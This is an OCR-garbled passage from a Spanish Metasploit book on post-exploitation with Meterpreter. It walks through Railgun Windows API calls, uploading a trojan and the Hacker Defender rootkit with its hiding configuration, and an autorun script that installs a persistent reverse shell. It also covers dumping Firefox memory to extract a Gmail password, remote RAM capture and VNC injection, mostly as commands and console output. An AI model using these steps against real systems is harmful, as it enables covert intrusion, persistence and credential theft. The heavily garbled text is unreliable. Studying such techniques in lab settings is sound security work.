FiS  4M:  Aclualizaci6n  de  mpn^oadMI,  M^pmernaSim*  e|  comonjo 


11.  Railgun 

£££  coruma  ^7 *£? r^f6"  ^  ****** 

pGS  sislemas  Windows.  °  pos,b,lldad  de  "^eractuar  directamente  con  la  API  de 

dei  comanj°  "L*  ueta * mter’ ei  cuai  pemiit° acceder  a  ™ 

Windows,  pudiendo  cann,-  ra f, 2 T°“  COd'8°  d,reCtamenle  para  la  infraction  con  la  API  de 

tfcamente  Lomendablf  Ifcla  urlT'"//  “7““  y  M  SU  c6dig0  fapu&  Es 
toiiocer  en  profundidad  he  f  ‘  •  URL  1P'  mdn' tmcrosoJL co^n-us/library/aa383  749  para 
F  p.otundtdad  las  Line, ones  que  se  encuentran  en  las  DLLs  que  pueden  utilizer. 
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iQuz  se  puede  hacer  con  Railgun ?  La  respuesta  es  todo,  ya  que  con  Railgun  se  pueden  invocar  Lxlas 
las  funciones  de  la  API  de  Windows ,  lo  cual  proporcionaun  potential  y  flexihjlidad  may  interesanle. 
Con  Railgun  se  puede  acceder  directamente  a  los  dispositivos  que  se  encuentran  disponibles  en 
la  maquina  vuinerada,  acceder  a  la  memoria,  mapear  dispositivos,  leer  y  escribir  de  disco,  y  un 
sinfin  de  posibilidades.  AI  principio  el  usuario  puede  ser  reacio  a  la  sintaxis  de  Railgun,  pero  es 
recomendable  aprenderlo  ya  que  la  potencia  que  proporciona  es  inigtiaiabie. 

neterpreter  >  irb  '  “ 

1*3  Starting  IRB  shell 

(*)  The  'client'  variable  holds  the  meterpreter  client 
*>  rg  *  client. railgun 

3>  #<Rex: -Post: ; Meterpreter: Extensions: -.Stdapi: : Railgun: : Railgun (0xe899eeflbf 2ed08  @clieRt»#<sess 
ion:(Beterp refer  192.168.1.35:1036  (1S2. 168. 1.35}  “NT  AUTHGRITY\SYSTEf4  @  PRUEBAS-0176i)CCu>  (EdUs= 

_ _ _ 

Fig  4.69:  Fjecueton  de  railgun  en  Meterpreter. 

A  continuacion  se  exponen  aigunos  codigos  de  ejeraplos  para  que  se  pueda  coiiocer  la  interaccidn 
con  la  API  de  Windows  y  la  potencia  que  Railgun  ofrece. 

#  Carga  Railgun  y  ejecuCa  una  orden 

rg  =  client . railgun 

jrg .  she!132  .  IsUserAnAdmin 

Hn  este  codigo  se  realiza  la  carga  de  Railgun,  obleniendo  una  instancia.  Adenitis,  se  ejecuta  uua 
orden  a  traves  de  la  DLL.v/;<?//J2.  La  funcion  ejeculada  es  la  pregunta IsUserAnAdmin,  de  la  euai  se 
obtendra  ia  respuesta  booleana,  por  ejemplo  { "GelLast Error  “=> 0,  "return  ”->iniej. 

rg . kernel32 . GetCurrentProcessId 

=>  ( "GetLastError"=>C,  "return"=>1108 ) 

rg . kernel32 . GetComputerNameA (250, 250) 

=>  t "GetLastError"=>203,  "return"=>true,  "IpBuf fer"=>"PRUEBAS-  01760CC",  "r.Si- 
ze"=>15) 

rg . user32 . LockWorkStation 

=>  { "GetLastError"=>0,  "return"=>0) 

Enel  cod  i  go  anterior  se  utilizan  d  istintas  funciones  como  GetCurrentProcessId  o  GetComputerNameA , 
de  la  DLL  kernel32.  Por  otro  lado,  se  ejecuta  la  funcion  LockWorkStation  con  lo  que  se  puede 
bloquear  la  maquina  vuinerada,  disponible  en  la  DLL  user32. 


»  rg . shell32 . IsUserAnAdmin 
=>  {"6etLastError,‘=>8,  "return"=>true} 

»  rg . kernel32 . GetCurrentProcessId 
=>  {"GetLastError"“>8,  ''return-^HOS) 

»  rg . kernel32 . GetCoiiiputerMameA(25e, 250) 

=>  {"GetUstError"s>203,  “return-^true,  “lpBuffer*,=>',.DRUEBAS-01760CC',r  “nSize“=>15} 

»  rg . user32 . LockWorkStation 

=>  {,lGetLastError"=>6,  "return-^true] _ 

Fig  4.70:  Fjecticidn  de  funciones  de  la  API  de  Windows  en  maquina  vuinerada. 

Como  ultimo  ejemplo  curioso  se  propone  ejecutar  la  siguiente  instruccion  rg.user32.MessageBoxA 
(0,  "kola”,  "mundo”,  ”MB_OK”).  Esta  instruccion  hara  que  se  muestre  un  pop-up  de  sislema  en  a 


maquina  vulnerada  mdicando  el  mensaje  configurado.  ^Se  podria  lanzar  una  veniana  que  si-mule  una 
lecogida  de  crederieiales?  De  nuevo,  ei  h'mite  esta  en  la  imaginacion  del  usuario. 


12.  Otras  PoC  interesantes 

I ,n  apailado  se  expiican  y  detallan  otras  pruebas  de  concepto  que  deben  ser  estudiadas 
!)iita  enlenderse  correctamente.  A  lo  largo  de!  capltulo  se  han  ido  estudiando  el  gran  numero  de 
posihilidades  que  ofrece  Meterpreter,  y  lo  important®  que  es  un  payload  para  realizar  una  correcla 
lase  de  post-explotacidn .  A  conlinuacion  se  explicaran  interesantes  pruebas  de  concepto  que 
comnlelan  un  interesante  capltulo  sobre  el  mejor payload disponible  en  Metasplnit  segun  la  mayorla 
de  I  os  usuarios. 

PoC:  Meterpreter,  troyanos  y  rootldts  educativos 

En  esta  prueba  de  concepto  se  presenta  la  posibilidad  de  subir  un  troyano  a  la  maquina  vulnerada  y 
ocultarlo  mediante  el  uso  de  un  rootkit.  Para  el  desarrollo  de  esta  prueba  de  concepto  se  ha  utitizndo, 
tanto  un  troyano  como  un  rootkit  educativo.  La  idea  de  estos  dos  tipos  de  malware  no  es  realizar 
acetones  malignas  sobre  las  vfetimas,  y  si  explicarel  fimeionamiento  de  estctino  de  apiicaciones.  El 
uso  de  ambos  es  realmente  senciflo  como  se  puede  ver  en  la  prueba  de  concepto, 

El  rootkit  utilizado  es  Hacker  Defender,  tambien  conocido  como  hxdef  mientrus  que  el  trovuno 
irtilizado  es  Flu,  el  cual  puede  ser  descargado  de  la  URL  http://wwwfki-project.com/downloadfhi/ 
jin.  El  punto  de  partida  de  la  prueba  de  concepto  es  una  sesion  de  Meterpreter  obtenida  mediante  la 
explotacion  de  una  vulnerabilidad  en  la  Else  previa  a  la  de  post-explotacidn. 

Para  subir  cl  ejecutable  del  troyano,  como  del  rootkit,  desde  la  sesion  de  Meterpreter  se  utiliza  ei 
comando  upload.  El  troyano  esta  compuesto  del  ejecutable,  mientras  que  el  rootkit  depende  dc 
su  fichero  INI  de  configuration,  que  tambien  debe  ser  subido  junto  a  su  ejecutable.  En  la  imagen 
se  puede  visual izar  la  subida  del  troyano  y  de  los  ficheros  del  rootkit,  ademas  de  la  ejecucion  del 
ejecutable  del  troyano. 

IS-t ergretei  >  upload  /root/flu.exe  c:\\windows\\systefli32  " 

U]  uploading  :  /root/flu.exe  ->  c:\windows\system32 

[*]  uploaded  :  /root/flu.exe  ->  c:\windows\system32\flu.exe 

leterpretcx  >  upload  /root/hxdef/hxdefl00.exe  c:\\windows\\system32\\ 

1+]  uploading  :  /root/hxdef Zhxdefl0O.exe  ->  c:\windows\system32\ 

t*]  uploaded  :  /root/hxdef /hxdef 100.exe  ->  c:\windcws\syste!n32\\hxdef 100.exe 

nieterpreter  >  upload  /root/hxdef /hxdef 100, ini  c : \\windows\\system32\\ 

[*]  uploading  :  /root/hxdef /hxdef 100.ini  ->  C:\windows\system32\ 

I*}  uploaded  :  /root/hxdef/hxdefl00.ini  ->  c:\windows\system32\\hxdefl00,in.i 
meterpreter  >  execute  -f  c:\\windows\\system32\\flu.exe 
Process  1994  created. 
meterpreter  > 


Pig  4.71:  Subida  de  malware  a  la  maquina  vulnerada  y  ejecucidn  de  troyano. 


Para  ello  se  ejecuta  e!  rootkit. ,  pero  antes  se  debe  configurar  su  fichero  INI.  Este  fichero 
configuracion  dispone  de  varios  apartados  0  secciones  en  los  que,  por  ejemplo  se  especifican  los 
procesos  que  deben  ser  ocultados  por  el  rootkit.  Se  permite  el  uso  de  metacaracteres,  por  ejemplo, 
se  quiere  ocultar  todo  proceso  que  empiece  por  flu,  se  puede  indicar  en  el  apartado  hidden  table  cle|J 
fichero  la  palabra/E/*.  En  la  imagen  se  mnestra  un  ejemplo  de  parte  del  fichero  de  configuration 
del  rootkit.  f 


hxdef* 

[Root  Processes] 

hxdef* 

rcmd.exe 

[Hidden  Services} 

HackerDefender* 

[Hidden  RegKeys] 

llacke  rDefenderl00 

LEGACYHACKERDEFENOER10G 

HackerDefenderDrvlflS 

LGGACY_HACKEROEFENDERDRV100 

[Hidden  RagValues] 

[Startup  Run] _ 

Fig  4.73:  Configuration  de  Hacker  Defender. 


Tras  la  ejecucion  del  rootkit,  se  ocultan  distintas  opcion.es  como  es  el  proceso  del  trQ^ndjett® 
adrpinistrador  de  tareas,  entradas  del  registro  del  troyano,  archivos  en  el  expIoi-ador,t:c6ti|| 
aettvas  del  troyano,  etcetera.  Es  realmente  potente  la  utilization  de  un  rootkit •  piirf i 
acciones  del  malware. 
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La  maquina  vulnerada  ha  quedado  infectada  por  el  troyano  y  ademas,  el  rouikii ,  ocitita  las  acciones 
maliciosas  que  este  realiza  y  su  preseneia.  El  rootkil,  logicamente,  tambien  puede  ocullarse  a  si 
mismo,  para  dificultar  su  preseneia  y  acciones. 

A  continuation  se  muestra  el  panel  del  troyano,  donde  se  pueden  visuatizar  las  maquinas  infectadas 
y  el  estado  de  estas. 


Fig  4,74:  Panel  de  administration  de!  troyano  para  manipular  la  maquina  vulnerada. 


Bn  este  punto  el  aiacante  tiene  el  control  de  la  maquina  vulnerada  permanentemente.  Este  troyano 
puede  reatizar  un  gran  numero  de  acciones  sobre  la  maquina  vulnerada,  por  ejemplo,  capturas 
de  pantalla,  captura  de  las  ptilsaciones  de  teciado  remoto,  utilizacion  de  las  tineas  de  comandos 
disponibles  en  la  maquina  infectada,  por  ejemplo  un  cmd  o  una  PowerShell.  En  la  imagen  se 
puede  visualizar  como  se  recupera  el  contenido  de  un  fichero  denominado  secret.txt  de  la  maquina 
vulnerada. 


>powerslieil  cat  secretltxt  • 

Secrets’  («  quo  caigatnos  otra  vez.„)  • 


user:  uluhe 

pass:  y  solo  dtgo  quo, 

user:  pablo 
pass:  164  bit 

user:  tnsf 

pass:  mmoa  quise  hacerte  da?o 
User:  flu 

pass:  pero  todo  sc  nos  tire 

usef;  y  aunque  ahora  soinos  como  extra?os 
pass:  yo  jamas  to  olvidare 

user:  ai.gonz 
pass;  c33ur 

User:  ftp  host 
pass;  j4f50g 


Fig  4.75:  Recuperation  de  un  fichero  a  travds  del  troyano. 


PoC:  Explotado  e  mfectado 

Esta  breve  prueba  de  concepto  ayuda  a  entender  la  importancia  que  tienen  las  opciones  avanzadas 
de  los  modulos  de  exploits  en  el  inslante  de  reatizar  la  explotacion.  El  escenario  es  sencillo,  se  va  a 
proceder  a  ia  explotacion  de  un  sistema  operativo,  del  cual  no  se  conoce  si  el  usuario  puede  apagar 
el  equipo  en  cualquier  momento,  si  es  posible  que  se  caiga  la  conexion,  o  si,  puede  que  sin  mAs  se 
necesite  reatizar  la  explotacion,  infectar  dicho  equipo  y  fmalizar  la  sesion.  Todas  estas  acciones  cube 
la  posibilidad  de  que  sucedan  en  un  rango  de  tiempo  de  pocos  o  muy  pocos  segundos. 

En  primer  lugar  se  procedera  a  la  automatizacion  de  un  script  RC  para  que.cuando  se  real  ice  In 
explotacion  se  ejecule  dicho  script.  El  script  contiene  ordenes  para  infectar  con  un  agente  y  de  este 
modo  conseguir  la  persjstencia  inmediatamente.  Ademas,  la  ultima  orden  es  exit  para  fmalizar  ia 
sesion  de  Meterpreter. 

Otra  posibilidad  es  util izar  el  comando  update  para  subir  el  ejecutable  de  un  troyano  y  ejecutarlo 
mediaate  execute ,  todo  esto  desde  un  fichero  de  automatizacion.  Se  podrla,anadir  un  rootkit  para 
ocultar  dicho  troyano.  Otra  option  interesante,  es  la  posibilidad  de  utilizan  ordenes  para  derribar 
sistemas  de  protection  que  pudiera  haber  en  la  maquina  vulnerada  antes  de  proceder  a  la  subida  de 
este  tipo  de  malware.  Todas  estas  instrucciones  se  podrian  escribir  en  un  script  y  automatizar  dicho 
proceso. 


msf  exploit (i»s08_O67jiet8pi)  >  set  AutoRunScript  muUi_console_command  -rc  /root/iniclallnfeccr 
an.rc 

AutoRunScript  =>  multiconsolecommand  -rc  /root/iniciallnfeccion. rc 
msf  exploit (tts03_067_netapi)  >  exploit 

l*]  Started  reverse  handler  on  192.168.1.40:4444 
[*]  Automatically  detecting  the  target... 

(*]  Fingerprint:  Windows  XP  -  Service  Pack  3  -  lang: Spanish 
[*!  Selected  Target:  Windows  XP  SP3  Spanish  (NX) 

(*]  Attempting  to  trigger  the  vulnerability... 

[*]  Sending  stage  (752128  bytes)  to  192.160,1.35 

(*]  Heterpreter  session  20  opened  (192.168.1.40:4444  ->  192.168.1.35:1037)  at  2012-08-31  21-45.! 
4  +0200 

J 

meterpreter  > 

[*]  Session  ID  20  (192.168.1.40:4444  ->  192.168.1.35:1037)  processing  AutoRunScript  'multiconso 
lecommand  -rc  /root/iniciallnfeccion. rc* 

(*]  Running  Command  List  ... 

(*]  Running  command  run  persistence  -U  -X  -P  windows/shell/reversejxp  -i  60  -p  4444  -r  392 
168.1.40 

(*}  Running  Persistance  Script 

(*]  Resource  file  for  cleanup  created  at  /root/.msf4/logs/persistence/PRUEBAS-01760CC  20120831  4 
515/PRUEBAS-01760CC20120831 . 4515 . rc 

(*1  Creating  Payload-windows/shell/reverse_tcp  LH0ST=192. 168. 1,40  LP0RT=4444 
[*J  Persistent  agent  script  is  611030  bytes  long  i 

h |  Persistent  Script  written  to  C:\WINDOWS\TEHP\WraaGFn.vbs 
(tj  Executing  script  C:\WINDOWS\TEMP\WraaGFn.ybs 
(  ■< !  Agent  executed  with  PID  360  , 

1*]  Installing  into  autorun  as  HKLMXSoftware^icrosoftXWindowsVCurrentVersionXRunW'flrgfdFhjRpnOQ1 
hi  Installed  into  autorun  as  HKLM\Software\Microsoft\Windows\CurrentVersion\Run\yNrgfdFhJRpHOQc 


Fig  4.76:  AutoejecuciOn  de  un  fichero  RC  provocando  infection  con  persistence. 
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HI  .script  ulilizado  dispone  del  siguiente  codigo: 

run  persistence  -U  -X  -P  windows/shell/reverse  tcp  -i  60  -p  4444 
-r  192.168.1.40 


La  Hnea  de  run  finaliza  con  la  direccion  IP,  todo  en  la  misma  linea,  sino  no  funcionaria.  Como  se 
puede  suponer  la  i  mag  mac  ion  de  cada  usuario  puede  ir  mas  alia  y  conseguir  realizar  gran  cantidad 
dc  aec iones  de  manera  aulomatica. 

Se  ha  configurado  la  ejeeucidn  de  persistence  con  tin  payload  de  tipo  no  Meterpreter.  Ya  se  ha 
n  ahzado  anleiiormente  una  actualizacion  de  tin  payload  a  im  Meterpreter ,  por  lo  que  simplemente 
se  puede  dejar  una  shell  y  si  se  requiere  mayor  funcionafidad,  en  cuaiquier  memento  se'  puede 
actual izar  a  Meterpreter. 

i 

(  omo  se  ha  mencionado  en  este  libro,  en  algunas  ocasiones  es  mejor  utilizar  un  payload  concrete 
que  aporte  una  luncionalidad  sin  necesiclad  de  disponer  de  todo  un  servidnr  dc  luncionalidades. 
Hslo  depende  de  lo  que  se  quiera  demostrar  y  de  lo  que  se  desee  obtener,  aunque  como  se  ve  en  este 
cjemplo  se  puede  provocar  la  actualizacion  a  un  Meterpreter .  Es  recomendable  pensar  que  payload 
utilizar  en  cada  memento  en  tuncion  de  las  necesidades. 


tipo  shell. 


msf  exploit (msGS  067jietapi}  >  use  exploit/routti/handler 
Sill  exploit (handler)  >  set  PAYLOAD  windows/shell/reverse  tco 
PAYLOAD  »>  windows/shell/reversetcp 
Hist  exploit  (handler)  >  set  LHOST  192.168.1.40 
LHOST  192.168.1.46 

msf  exploit(handler)  >  set  LPORT  4444  j 

LPORT  =>  4444 

Ml  exploit! handler )  >  exploit 

Started  reverse  handler  on  192.168.1.46:4444 
[?|  Starting  the  payload  handler... 

M  Sending  stage  (240  bytes)  to  192.168.1.35 

I*]  Comfflar,d  shell  session  21  opened  (192.168.1.40:4444  ->  192.163.1.35:1055)  at  2012-08-31  21-57 
:41  +0260 

Microsoft  windows  XP  [Version  5.1.2600] 

(0  Copyright  1985-2001  Microsoft  Corp. 

C:\WIND0WS\system32>8 

Fig  4.77:  Obtencion  de  una  shell  raediante persistence. 

I  0!  ultimo,  se  provoca  la  actualizacion  del  payload  a  un  Meterpreter ,  mediante  la  subida  de  un 
stager. 
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;*[  SheU  SeS5i0n  21  ppgned  (192.168.1.40:4444  ->  192,168.1.35: 1055)  at  28l£iiTii ' 2i >57 

Microsoft  Windows  XP  [Versify  5.1.26001 
(C)  Copyright  1985-2001  Microsoft  Corp. 

C:\WINDGWS\system32>AZ  \ 

Background  session  21?  [y/N]  y 

i§f  exploit (handler)  >  sessions  -u  21 

t*I  Started  reverse  handler  on  192.168.1.40:4444 
f+]  Starting  the  payload  handler... 

?*1  Command  Stager  progress  -  1.66%  done  (1699/102108  bytes) 

1*1  Command  Stager  progress  -  3.33%  done  (3398/102108  bytes) 

1*1  Command  Stager  progress  -  4.99%  done  (5097/102108  bytes) 

1*1  Command  stager  progress  -  6.66%  done  (6796/102108  bytes) 

1*1  Command  Stager  progress  -  8.32%  done  (8495/102108  bytes) 

1*1  Command  Stager  progress  -  9.98%  done  (10194/102108  bytes) 
j»i  Command  Stager  progress  -  11.65%  done  (11893/102108  bytes) 

Fig  4.78:  Actual  izacion  de  shell  a  Meterpreter.  ~~~ 


PgC:  Volcado  de  memoria  remota  y  analisis 

En  este  prueba  de  concepto  se  busca  lograr  ia  informacten  volatil  de  la  maquina  vulnerada,  es  deck, 
la  informacion  que  se  perdera  cuando  la  maquina  remota  se  apague.  Para  obtener  informacion  sobre 
h  memoria  RAM  c!e  !a  maquina  vulnerada  se  dispone  en  Meterpreter  de  un  script ,  denominado 
process jnemdmnp,  capaz  de  hacer  volcados  de  memoria  de  procesos.  Tambien  se  podrian  utilizar 
herramientas  como  Win32dd,  la  cual  deberia  ser  subida  a  la  maquina.de  la  victims,  para  realizar 
volcados  0  dumpeos  de  memoria  completes. 

hn  este  caso  se  real  izar  A  un  volcado  de  memoria  del  proceso  Firefox  y  se  procedera  a  la  busqueda  de 
credenciales  almacenadas  u  otros  datos  de  inters  para  el  atacante.  En  el  ejemplo  se  mostraracomo 
las  credenciales  quedan  almacenadas  en  texto  piano  por  el  proceso  del  navegador,  aunque  el  sitio 
web  donde  fueran  introducidas  dispusiera  de  capa  de  seguridad,  que  en  este  caso  se  corresponde  con 
la  seguridad  de  Gmail. 

El  script  process jnemdump  dispone  de  varios  parametros,  de  los  cuales  se  detallan  a  conlinuacion 
los  ntes  interesaiiies: 

-  El  para  metro  -n  especifica  el  nombre  del  proceso  del  que  se  realizara  el  volcado  de 
memoria. 

-  El  parametro  -p  especifica  el  PID  del  proceso  del  que  se  quiere  realizar  el  volcado  de 
memoria. 

-  El  parametro  -r  especifica  el  fichero  de  texto  de  donde  se  recogeran  los  PID  de  los 
procesos  de  los  que  se  quiere  realizar  el  volcado  de  memoria.  Se  debe  especificar  tin  PID  por 
cada  linea  del  fichero  de  texto. 
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interpreter  >  run  process  jRemduinp  -h 
ISAGE: 

EXAMPLE:  run  processdump  putty.exe 
EXAMPLE:  run  process jiump  -p  1234 

3PTI0NS : 

-h  Help  menu. 

-n  <opt>  Name  of  process  to  dump. 

-p  «opt>  PID  of  process  to  dump. 

-q  Query  the  size  of  the  Process  that  would  be  dump  in  bytes. 

ine. 


_ ! 

Fig 4.79:  Oblcnci6n  de  la  memoria  del  proceso  de  Firefox  en  una  in&quinn  vuluerada. 

Tras  ejecutar  el  script  se  precede  a  ia  descarga  automatica  del  volcado  de  la  memoria  del  proceso. 
Este  archivo  se  almacena  en  la  ruta  $HOME/.msf4/iogs/scripls/procjnemdump/<fichero  DMP>.  Se 
puede  observar  que  al  ejecutar  el  comando  de  Linux  cai  se  puede  visuaiizar  el  conienido  del  archivo, 
la  mayoria  es  binario,  pero  se  puede  observar  como  existen  cadenas  de  texlo  legibles.  Mediante  el 
uso  del  comando  strings  se  va  a  fiitrar  todo  el  contenido  no  legible,  es  decir,  Lodo  lo  que  no  sean 
caracteres  de  texto  se  despreciara.  Por  ultimo  utilizando  el  comando  grep  se  filtrara  la  salida  de 
strings  para  localizar  las  palabras  clave  que  se  quieten  obtener. 

Por  ejemplo,  se  va  a  proceder  a  realizar  la  busqueda  de  credenciales  en  ei  proceso  de  Firefox  del  que 
se  ha  realizado  el  volcado.  Al  ejecutar  la  instruccion  cat  <fichero  DMP>  |  strings  [  grep  Passwd , 
se  obtieue  informacion  may  interesante  como  es  la  credencial  con  la  que,  segun  la  direccion,  se  ha 
jogueado  en  el  webmail  de  Gmail. 


root(jjbt : -/ . wsf 4/logs/scripts/procjaemdui)ip#  cat  192 . 16R .  1. 35_f irefox . exe_1348_2B 120908. 0319 . dmp  | 
strings  j  grep  Passwd 

autube%3A679%3Al&checkedDomains=youtube&tiffleStnip=&secTok=&Eniail=pablo%40llu&Passwd=i23abc.&signI 

n=Iniciar+sesi%C3%B3n&nnShown=l 

el ("Passwd "5; 

var  passwc^elem  =  el ("Passwd" ) ; 

>  else  if  (f. Passwd)  { 
f .Passwd. focus  0; 

}  else  if  (f. Passwd)  { 
f. Passwd. focus () ; 
id="Passwd” 

continue=http%3A%2F%2Fmail ,  google.  com%2Fniail%2F&service=ntail&irm=falseSidsh=38668449881l8792813&lt 
mpl=default&scc-l&GALX=T3A7.eCa7WLk&pstMsg=l&dnConn=&checkConnection=youtube%3A679%3Al&checkedDom 
ains=youtube&timeStmp=&secTokg&Email=pablo%46flu&Passwd=123abc.&sign.Tn=Iniciart5esi%C3%B3n&rinSlio 

Fig  4.80:  Oblencion  de  credenciales  del  proceso  de  Firefox. 


Por  ultimo  se  presenta  la  posibilidad  de  realizar  un  volcado  completo  de  la  memoria  RAM  y  un 
analisis  de  esta  mediante  el  framework  de  Volatility,  el  cuai  puede  ser  descargado  desde  la  URL 
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https://wmv.volatilesyslems.com/ckfault/volalility.  Para  realizar  el  volcado  de  la  memoria  RAM  se 
pueden  utilizar  una  serie  de  aplicaciones,  como  MDD  o  WinS2dd. 

En  primer  lugar,  se  sube  a  la  maquina  vulnerada  la  herramienta  Win32tld ,  por  ejemplo  en  la  ruta 
c:\.  Para  realizar  el  volcado  de  la  memoria  RAM  de  la  maquina  vulnerada  se  ejecuta  la  inslmeckVn 
win32dd.exe  fr  if  <ftchero>  /a.  El  parametra  /r  indica  que  set  a  un  volcado  de -tipe  raw,  /f  el  lichero 
donde  se  almacenara  y  /a  que  se  aceptaran  todas  las  preguntas  que  realice  la  aplicaeion. 

C:\win32dd.exe  JifT c:\vnlcado.bin  /a 
win32dd.exe  /r  /f  c:\vclcado.bin  /a 

win32dd  -  1.3.1.20109417  -  (Community  Edition) 

Kernel  land  physical  memory  acquisition 

Copyright  (C)  2007  -  2019,  Hatthieu  Suiche  <http://wwi-r.msuiche.net> 

Copyright  (C)  2909  -  2019,  HoonSols  <http://www.moonsols.com> 

Name  Value 


File  type:  Raw  memory  dump  file 

Acquisition  method:  PFN  Mapping 

Content:  Memory  manager  physical  memory  block 

Destination  path:  c:\volcado.bin 

O.S.  Version:  Microsoft  Windows  XP  Professional  Service  Pack  3  (build  2603) 

Computer  name:  PRUEBA5-01760CC 

Physical  memory  in  use;  81% 

Physical  memory  size:  196080  Kb  (  191  Mb) 

Physical  memory  available:  36176  Kb  (  35  Mb) 

Paging  file  size:  967776  Kb  (  945  Mb) _ _ _ 

Fig  4.81 :  Realizacion  de!  volcado  de  la  memoria  RAM  de  manera  remota. 

Una  vez  que  se  realiza  el  volcado  de  la  RAM,  se  debe  descargar  la  iinagen  manualmente,  a- braves 
de  la  ejecucion  del  comando  download  de  Meterpreter.  Este  proceso  puede  llevar  baslante  tiempo, 
ya  que  dependent  del  tamano  de  la  memoria  RAM  de  la  maquina  vulnerada.  En  este  ejemplo,  la 
memoria  RAM  del  equipo  remote  es  de  192  MB. 

meteroreter  >  download  c: \\volcado.bin  /root 

I*)  downloading:  c:\volcado.bin  ->  /root/ volcado. bin 

[•*]  downloaded  :  c:\volcado.bin  ->  /root/volcado.bin 

Fig  4.82  Descarga  del  volcado  completo  de  la  memoria  RAM  de  la  maquina  vulnerada. 

En  este  momento  hay  que  utilizar  el  framework  de  Volatility  para  sacar  la  maxima  informacion  de  ia 
maquina  vulnerada.  Este  framework  permite  realizar  gran  cantidad  de  opciones  sobre  imageries  de 
volcado  de  memoria  RAM,  serla  necesario  dedicar  tiempo  a  su  estudio  y  aprovcchamiento.  Pero  ei 
objetivo  de  la  prueba  de  concepto  es  ilustrar  algunas  de  las  posibilidades  que  Volatility  proporcionn. 

Para  ejecutar  ia  ayuda  dc  Volatility  se  debe  ejecutar  python  vol.py-h ,  dicho  archivo  estara  situado 
en  ei  directorio  donde  se  encuentren  ios  archivos  Python  del  framework  Volatility.  Si  se  quieren 
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consular  las  conesiones  activas  en  el  momenta  de  realizar  el  volcado  de  la  memoria  RAM  se  debe 
ejeciHar  la  siguiente  tmmuAtm  python  vol.py  connections  ~/<f,ckero  WN>. 


i:?I?;:'f°latiUtr2'1#  python  vol,py  C0r}nections  -f  /root/volcadc.bir, 
Volatile  Systems  Volatility  Framework  2.1 

Offset (V)  Local  Address  Remote  Address  Pid 


Ox80dsbBeO 
0x8t)d6fce0 
9x8Oe23dl0  : 
0X(!0e574B8  : 
0x80e6a0eB  : 
exfleeEcifa  ] 
Ox80eOd00O  3 

Ox80e/69e0  3 
0x8fle775a6  ] 
0x86e709e0  ] 
0x80ecl)lf8  1 


0.1:1046 

0.1:1045 

0.1:1048 

0.1:1047 

0.1.35:1154 

B.  1.35;  1150 

3.1.35:1142 

3.1.35:1114 

3.1.35:1110 

3.1.35:1134 

3.1.35:1070 


Remote  Address 

127.6.0.1:1045 

127.0.0.1:1046 

127.0.0.1:1047 

127.0.0.1:1048 

74.125.230.203:1 

74.125.230.203:1 

74.125.230.203:1 

74. 125. 230. 203 :l 

74. 125.230.203:1 

173. 194.66. 121:f 

173.194.67.191:8 


hj-  4.83,  Rectipeiacmn  de  conexiones  activas  del  fichero  del  volcado  de  la  RAM  remote. 

Para  vistiahzar  los  archivos  abierlos  por  los  procesos  que  se  encontrahan  en  ejecucion  en  el  momenta 
clet  volcado  de  ia  memoria  RAM  remota  se  debe  ejecutar  la  instruccion python  vol.py  files  -f< fichero 
Olra  instruccion  interesante  es  la  recuperation  del  listado  de  procesos  en’ ejecucion  en  ese 
momenta  python  vol.py  nslis  —f  <fichero  BJN>. 


Jf :  ul* 1  python  vol.py  pslist  -f  /root/volcado.bin - - 

[ValatiLe  Systems  Volatility  Framework  2.1 

fSft<V)  PT0  PPID  Thds  Hnds  sess  WOW64  start 


0x86fld820  system 
OxffbnfidaO  sir.ss.exe 
0xflbc36en  csrss.exe 
|0x80d63eO8  v.*inl oqon.exe 


644  424  11 


0  2012-09-07  23:32:07 
0  2012-09-07  23:32:07 


0  20K'-f)9-fl/  23:32:97 


biy  4.84;  Recuperacion  del  listado  de  procesos  del  fichero  del  volcado  de  la  RAM  remota. 

Las  post  ml  idades  que  ofrece  Volatility  para  el  analisis  forense  son  ilimitadas,  nor  io  one  se  recomienda 
su  estudio  y  la  realization  de  pruebas  para  comprender  y  entender  todo  lei  que  este  framework  es 
uipaz  de  proporcionar  al  usuario.  ;  ' 


PoC:  VNC  Payload 

111  f(a,prueba  de  concepto  se  presenta  la  utilization  de  un  payload  un  tan.to  peculiar.  Con  este 
payload  se  podia  visualizar  el  escritorio  remoto  de  la  victima.  Hay  varias  maneras  dc  utilizar  VNC 
en  I'le/asploit,  e!  objetivo  es  poder  visualizar  el  escritorio  de  la  victima,  sin  que  etia  detecte  la  I 
circunstancia. 

l!l  prin,er/caso  c|ue  se  esludiart  es  el  del  Placid  vncinject.  El  payload  cargado  debe  ser  windows/ 
vncmjecl/reversejcp,  conexMSn  inverse  por  ejemplo.  Este  payload  inyecta  un  servidor  VNC  en  la 
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rnemoria  de  la  maquina  vulneracla,  el  exploit  conecta  automaticamente  con  este  y  se  obtiene  la  vision 
del  escritorio  de  la  victima. 

msf  exploit (ms08_067_netapi)  >  exploit 

(*j  Started  reverse  handler  on  192.168,1.40:4444 
1*1  Automatically  detecting  the  target... 

M  Fingerprint:  Windows  XP  -  Service  Pack  3  -  lang:Spanish 
M  Selected  Target:  Windows  XP  SP3  Spanish  (NX) 

[*]  Attempting  to  trigger  the  vulnerability... 

[*J  Sending  stage  (445440  bytes)  to  192.168.1,35 
[*]  Starting  local  TCP  relay  on  127.0.0.1:5900... 

!*)  Local  TCP  relay  started. 

1*1  Launched  vneviewer. 

HI  Session  1  created  in  the  background. 

mst  exploit {ms0SJJ6?_netapi)  >  Connected  to  RFB  server,  using  protocol  version  3.8 

Enabling  TightVNC  protocol  extensions 

No  authentication  needed 

Authentication  successful 

Desktop  name  “pruebas-01760cc‘' 

VNC  server  default  format: 

32  bits  per  pixel. 

Least  significant  byte  first  in  each  pixel. 

True  colour:  max  red  255  green  255  blue  255,  shift  red  16  green  8  blue  0 
Warning:  Cannot  convert  string  “-*-helvetica-bold-r-*-*-i6-*-*-*-*-*-*-*"  to  type  FontStruct 
Using  default  colormap  which  is  TrueColor.  Pixel  format: 

32  bits  per  pixel. 

Least  significant  byte  first  in  each  pixel. 

True  colour:  max  red  255  green  255  blue  255,  shift  red  16  green  8  blue  S 
Same  machine:  preferring  raw  encoding _ ‘ 

Pig  4.85:  Explolaoion  con  inyccci6n  de  windows/vncmject/reversejcp. 

Hay  que  tener  cuidndo  eon  este  payload  ya  que  reafiza  la  apertura  de  una  cmd  en  la  maquina 
vulneiada.  Esta  situation  es  extrana  para  el  usuario  victima,  ei  cual  se  puecle  alertar  de  la  presencia 
del  atacante  al  visualizar  dioho  evento. 


Imeteroreter  >  run  vne 

